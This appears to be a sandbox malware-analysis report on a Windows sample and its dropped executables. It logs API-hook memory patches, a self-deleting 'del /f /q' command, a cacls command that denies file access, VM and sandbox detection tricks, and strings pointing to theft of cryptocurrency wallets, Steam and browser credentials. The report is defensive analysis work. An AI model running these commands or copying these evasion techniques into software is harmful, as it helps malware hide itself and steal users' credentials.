Source: C:\Users\user\AppData\Local\Temp\1000017001\Emit64.exe	Memory written: PID: 3920 base: 7FFC3225000D value: E9 6B 9B EC FF
Source: C:\Users\user\AppData\Local\Temp\1000017001\Emit64.exe	Memory written: PID: 3920 base: 7FFC32119B70 value: E9 AA 64 13 00
Source: C:\Users\user\1000018002\avicapn32.exe	Memory written: PID: 1112 base: 1C70005 value: E9 FB 99 C7 75
Source: C:\Users\user\1000018002\avicapn32.exe	Memory written: PID: 1112 base: 778E9A00 value: E9 0A 66 38 8A
Source: C:\Users\user\1000018002\avicapn32.exe	Memory written: PID: 1112 base: 1C90007 value: E9 7B 4C C9 75
Source: C:\Users\user\1000018002\avicapn32.exe	Memory written: PID: 1112 base: 77924C80 value: E9 8E B3 36 8A
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: PID: 2820 base: FB0005 value: E9 FB 99 93 76
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: PID: 2820 base: 778E9A00 value: E9 0A 66 6C 89
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: PID: 2820 base: FC0007 value: E9 7B 4C 96 76
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: PID: 2820 base: 77924C80 value: E9 8E B3 69 89
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: PID: 2820 base: FD0005 value: E9 FB BF 8E 76
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: PID: 2820 base: 778BC000 value: E9 0A 40 71 89
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: PID: 2820 base: 1170008 value: E9 AB E0 78 76
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: PID: 2820 base: 778FE0B0 value: E9 60 1F 87 89
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: PID: 2820 base: 1180005 value: E9 CB 5A 78 73
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: PID: 2820 base: 74905AD0 value: E9 3A A5 87 8C
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: PID: 2820 base: 1190005 value: E9 5B B0 79 73
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: PID: 2820 base: 7492B060 value: E9 AA 4F 86 8C
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: PID: 2820 base: 11A0005 value: E9 DB F8 B0 75
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: PID: 2820 base: 76CAF8E0 value: E9 2A 07 4F 8A
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: PID: 2820 base: 11B0005 value: E9 FB 42 B2 75
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: PID: 2820 base: 76CD4300 value: E9 0A BD 4D 8A

Overwrites code with function prologues

Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: PID: 6128 base: 778BC000 value: 8B FF 55 8B EC	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: PID: 6128 base: 74905AD0 value: 8B FF 55 8B EC	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: PID: 6128 base: 7492B060 value: 8B FF 55 8B EC	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: PID: 6128 base: 76CAF8E0 value: 8B FF 55 8B EC	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: PID: 6128 base: 76CD4300 value: 8B FF 55 8B EC	Jump to behavior

Self deletion via cmd or bat file

Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	Process created: "C:\Windows\System32\cmd.exe" /c timeout /t 6 & del /f /q "C:\Users\user\Desktop\DQxttu2Qrr.exe" & exit
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	Process created: "C:\Windows\System32\cmd.exe" /c timeout /t 6 & del /f /q "C:\Users\user\Desktop\DQxttu2Qrr.exe" & exit			Jump to behavior

Found hidden mapped module (file has been removed from disk)

Source: C:\Users\user\AppData\Local\Temp\1000017001\Emit64.exe

Module Loaded: C:\USERS\user\LOCKTIME\RTKAUDUSERVICE64.EXE

Uses cacls to modify the permissions of files

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\cacls.exe CACLS "gntuud.exe" /P "user:N"

Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\61312899942613011832.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\1000018002\avicapn32.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Users\user\1000018002\avicapn32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	System information queried: FirmwareTableInformation	Jump to behavior
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	System information queried: FirmwareTableInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000017001\Emit64.exe	System information queried: FirmwareTableInformation
Source: C:\Users\user\AppData\Local\Temp\1000017001\Emit64.exe	System information queried: FirmwareTableInformation

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: Emit64.exe, 0000001A.00000002.464895323.00000014243FC000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: SBIEDLL.DLL
Source: umciavi64.exe, 00000031.00000003.619550432.000000000F2F1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VCRUNTIME140.DLLSOFTOKN3.DLLNSS3.DLLMSVCP140.DLLMOZGLUE.DLLFREEBL3.DLL\SOFT\STEAM\\CONFIG\\|UPDATEHTTPANALYZERSTDV7.EXEWIRESHARK.EXEHTTP ANALYZERCOMSTONESNOWBIGWALETS%S\%S\%S\%S\%S%S\%S\%S\%S.EXODUS\EXODUS.WALLET.JSONEXODUS\BACKUPS\EXODUS\BACKUPSHTTP200
Source: umciavi64.exe, 00000031.00000003.619550432.000000000F2F1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: WIRESHARK.EXE

Tries to evade analysis by execution special instruction (VM detection)

Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	Special instruction interceptor: First address: 0000000001690363 instructions rdtsc caused by: RDTSC with Trap Flag (TF)
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	Special instruction interceptor: First address: 00000000015D656D instructions rdtsc caused by: RDTSC with Trap Flag (TF)
Source: C:\ProgramData\61312899942613011832.exe	Special instruction interceptor: First address: 00000000017925FE instructions rdtsc caused by: RDTSC with Trap Flag (TF)
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	Special instruction interceptor: First address: 0000000000A125FE instructions rdtsc caused by: RDTSC with Trap Flag (TF)
Source: C:\Users\user\AppData\Local\Temp\1000017001\Emit64.exe	Special instruction interceptor: First address: 00007FF676892A58 instructions rdtsc caused by: RDTSC with Trap Flag (TF)
Source: C:\Users\user\AppData\Local\Temp\1000017001\Emit64.exe	Special instruction interceptor: First address: 00007FF676892A96 instructions rdtsc caused by: RDTSC with Trap Flag (TF)
Source: C:\Users\user\1000018002\avicapn32.exe	Special instruction interceptor: First address: 00000000016299BA instructions rdtsc caused by: RDTSC with Trap Flag (TF)

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	RDTSC instruction interceptor: First address: 000000000176B0FE second address: 000000000176B10D instructions: 0x00000000 rdtsc 0x00000002 inc cl 0x00000004 not dh 0x00000006 neg cl 0x00000008 mov dl, 15h 0x0000000a dec cl 0x0000000c sub ax, di 0x0000000f rdtsc
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	RDTSC instruction interceptor: First address: 00000000014D7B49 second address: 00000000014D7B51 instructions: 0x00000000 rdtsc 0x00000002 inc ecx 0x00000003 movzx ecx, si 0x00000006 inc ecx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	RDTSC instruction interceptor: First address: 00000000016693EB second address: 0000000001669432 instructions: 0x00000000 rdtsc 0x00000002 dec ecx 0x00000003 xchg eax, edi 0x00000004 inc ecx 0x00000005 pop eax 0x00000006 dec eax 0x00000007 cmovbe eax, eax 0x0000000a inc cx 0x0000000c xchg esp, ebx 0x0000000e inc ecx 0x0000000f pop edx 0x00000010 inc ecx 0x00000011 xchg bh, cl 0x00000013 dec eax 0x00000014 cwde 0x00000015 cdq 0x00000016 inc ecx 0x00000017 pop edi 0x00000018 pop ecx 0x00000019 inc bp 0x0000001b movsx esp, dl 0x0000001e cwd 0x00000020 lahf 0x00000021 inc ecx 0x00000022 pop ecx 0x00000023 inc ecx 0x00000024 movzx ebx, si 0x00000027 inc eax 0x00000028 setb bh 0x0000002b inc cx 0x0000002d xchg esp, ebx 0x0000002f pop esi 0x00000030 movzx eax, bp 0x00000033 inc cx 0x00000035 movsx eax, al 0x00000038 pop edi 0x00000039 pop ebx 0x0000003a setb ah 0x0000003d inc ebp 0x0000003e movzx esi, ax 0x00000041 inc ecx 0x00000042 pop esp 0x00000043 dec esp 0x00000044 movzx esi, ax 0x00000047 rdtsc
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	RDTSC instruction interceptor: First address: 00000000016D9DA1 second address: 00000000014DE6C8 instructions: 0x00000000 rdtsc 0x00000002 cdq 0x00000003 pop ebp 0x00000004 dec esp 0x00000005 arpl dx, ax 0x00000007 dec ecx 0x00000008 cmovb edi, ecx 0x0000000b inc ecx 0x0000000c pop ebx 0x0000000d inc ebp 0x0000000e mov bh, bh 0x00000010 dec ecx 0x00000011 arpl dx, cx 0x00000013 inc ecx 0x00000014 pop eax 0x00000015 cbw 0x00000017 dec eax 0x00000018 movsx ecx, di 0x0000001b dec ebp 0x0000001c cmovle esi, eax 0x0000001f inc ecx 0x00000020 pop edx 0x00000021 cbw 0x00000023 jmp 00007FB5AC78D92Ch 0x00000028 inc ecx 0x00000029 pop edi 0x0000002a inc esp 0x0000002b movzx ecx, si 0x0000002e pop ecx 0x0000002f cwde 0x00000030 rdtsc
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	RDTSC instruction interceptor: First address: 000000000176451B second address: 000000000176452D instructions: 0x00000000 rdtsc 0x00000002 inc ecx 0x00000003 pop edx 0x00000004 dec ecx 0x00000005 movzx ebx, ax 0x00000008 inc ecx 0x00000009 pop edi 0x0000000a cbw 0x0000000c pop ecx 0x0000000d inc eax 0x0000000e mov dh, dh 0x00000010 inc ecx 0x00000011 pop ecx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	RDTSC instruction interceptor: First address: 000000000176452D second address: 000000000176453B instructions: 0x00000000 rdtsc 0x00000002 inc cx 0x00000004 bswap esi 0x00000006 pop esi 0x00000007 inc esp 0x00000008 mov ah, dl 0x0000000a pop edi 0x0000000b dec esp 0x0000000c arpl bp, si 0x0000000e rdtsc
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	RDTSC instruction interceptor: First address: 00000000016FA149 second address: 0000000001BA06F4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB5ACE2F84Fh 0x00000007 inc ecx 0x00000008 pop ecx 0x00000009 pop esi 0x0000000a inc ecx 0x0000000b mov bl, bl 0x0000000d pop edi 0x0000000e movsx eax, bp 0x00000011 rdtsc
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	RDTSC instruction interceptor: First address: 000000000173E4D5 second address: 0000000001696CB2 instructions: 0x00000000 rdtsc 0x00000002 pop ecx 0x00000003 cwd 0x00000005 inc ecx 0x00000006 pop ecx 0x00000007 lahf 0x00000008 pop esi 0x00000009 pop edi 0x0000000a lahf 0x0000000b dec ebp 0x0000000c arpl bp, sp 0x0000000e pop ebx 0x0000000f jmp 00007FB5AC8E17FCh 0x00000014 inc ecx 0x00000015 pop esp 0x00000016 rdtsc
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	RDTSC instruction interceptor: First address: 00000000016C0841 second address: 000000000172F30A instructions: 0x00000000 rdtsc 0x00000002 inc esp 0x00000003 movsx ebp, bx 0x00000006 inc ecx 0x00000007 pop ebp 0x00000008 inc bp 0x0000000a movzx edi, cl 0x0000000d pop ebp 0x0000000e inc ecx 0x0000000f pop ebx 0x00000010 inc ecx 0x00000011 pop eax 0x00000012 inc ecx 0x00000013 pop edx 0x00000014 inc ebp 0x00000015 movsx edi, dx 0x00000018 dec ebp 0x00000019 arpl si, si 0x0000001b dec eax 0x0000001c movzx edx, di 0x0000001f inc ecx 0x00000020 pop edi 0x00000021 mov si, 6F30h 0x00000025 dec eax 0x00000026 cdq 0x00000027 dec eax 0x00000028 movsx ebx, bp 0x0000002b pop ecx 0x0000002c jmp 00007FB5AC9F7D3Ch 0x00000031 inc ecx 0x00000032 pop ecx 0x00000033 cdq 0x00000034 inc cx 0x00000036 movsx eax, dh 0x00000039 inc esp 0x0000003a movsx esp, bp 0x0000003d pop esi 0x0000003e cbw 0x00000040 pop edi 0x00000041 pop ebx 0x00000042 rdtsc
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	RDTSC instruction interceptor: First address: 000000000172F30A second address: 000000000172F310 instructions: 0x00000000 rdtsc 0x00000002 inc ecx 0x00000003 pop esp 0x00000004 cwd 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	RDTSC instruction interceptor: First address: 00000000016B2E25 second address: 00000000016B2E5E instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 mov edi, 61C07295h 0x00000009 inc ecx 0x0000000a pop eax 0x0000000b dec eax 0x0000000c cdq 0x0000000d dec ebp 0x0000000e movsx esp, sp 0x00000011 lahf 0x00000012 inc ecx 0x00000013 pop edx 0x00000014 dec eax 0x00000015 cdq 0x00000016 inc ecx 0x00000017 pop edi 0x00000018 movzx ax, ah 0x0000001c cwd 0x0000001e cdq 0x0000001f pop ecx 0x00000020 inc ecx 0x00000021 pop ecx 0x00000022 inc esp 0x00000023 movzx esp, di 0x00000026 inc ebp 0x00000027 movsx esp, dx 0x0000002a inc ecx 0x0000002b xchg dh, al 0x0000002d pop esi 0x0000002e cbw 0x00000030 dec ecx 0x00000031 arpl sp, bx 0x00000033 inc cx 0x00000035 movzx eax, bl 0x00000038 pop edi 0x00000039 rdtsc
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	RDTSC instruction interceptor: First address: 00000000010EEF30 second address: 00000000010EEF3F instructions: 0x00000000 rdtsc 0x00000002 inc cl 0x00000004 not dh 0x00000006 neg cl 0x00000008 mov dl, 15h 0x0000000a dec cl 0x0000000c sub ax, di 0x0000000f rdtsc
Source: C:\ProgramData\61312899942613011832.exe	RDTSC instruction interceptor: First address: 00000000017925FE second address: 00000000017B33CF instructions: 0x00000000 rdtsc 0x00000002 nop 0x00000003 call 00007FB5AC944211h 0x00000008 call 00007FB5AC8E2A91h 0x0000000d mov dword ptr [esp+04h], 7A546ADEh 0x00000015 lea esp, dword ptr [esp+04h] 0x00000019 call 00007FB5ACA9592Ah 0x0000001e push edx 0x0000001f push eax 0x00000020 cmovnl eax, ebp 0x00000023 push ebp 0x00000024 rdtsc
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	RDTSC instruction interceptor: First address: 0000000000A125FE second address: 0000000000A333CF instructions: 0x00000000 rdtsc 0x00000002 nop 0x00000003 call 00007FB5AC943F91h 0x00000008 call 00007FB5AC8E2811h 0x0000000d mov dword ptr [esp+04h], 7A546ADEh 0x00000015 lea esp, dword ptr [esp+04h] 0x00000019 call 00007FB5ACA956AAh 0x0000001e push edx 0x0000001f push eax 0x00000020 cmovnl eax, ebp 0x00000023 push ebp 0x00000024 rdtsc
Source: C:\Windows\SysWOW64\rundll32.exe	RDTSC instruction interceptor: First address: 000000000527D526 second address: 000000000527D559 instructions: 0x00000000 rdtsc 0x00000002 movsx dx, bh 0x00000006 dec cl 0x00000008 or edx, ecx 0x0000000a bts edx, ecx 0x0000000d xchg dh, dh 0x0000000f not cl 0x00000011 cbw 0x00000013 neg cl 0x00000015 bsf eax, eax 0x00000018 mov eax, 78B605B0h 0x0000001d or ah, FFFFFF9Eh 0x00000020 add cl, FFFFFF94h 0x00000023 xor bl, cl 0x00000025 or dh, dl 0x00000027 push ebp 0x00000028 inc ebp 0x00000029 cdq 0x0000002a cwd 0x0000002c push esi 0x0000002d push ebx 0x0000002e xor bp, di 0x00000031 cwd 0x00000033 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000017001\Emit64.exe	RDTSC instruction interceptor: First address: 00007FF676941E5F second address: 00007FF676941E7F instructions: 0x00000000 rdtsc 0x00000002 pop ecx 0x00000003 inc ecx 0x00000004 pop edi 0x00000005 inc ecx 0x00000006 pop ecx 0x00000007 inc ebp 0x00000008 cmp al, bh 0x0000000a inc bp 0x0000000c bsr eax, edx 0x0000000f inc ecx 0x00000010 pop edx 0x00000011 inc esp 0x00000012 btr edx, esp 0x00000015 pop ebp 0x00000016 btr ebx, 44h 0x0000001a dec eax 0x0000001b btc edi, esi 0x0000001e popfd 0x0000001f lahf 0x00000020 rdtsc
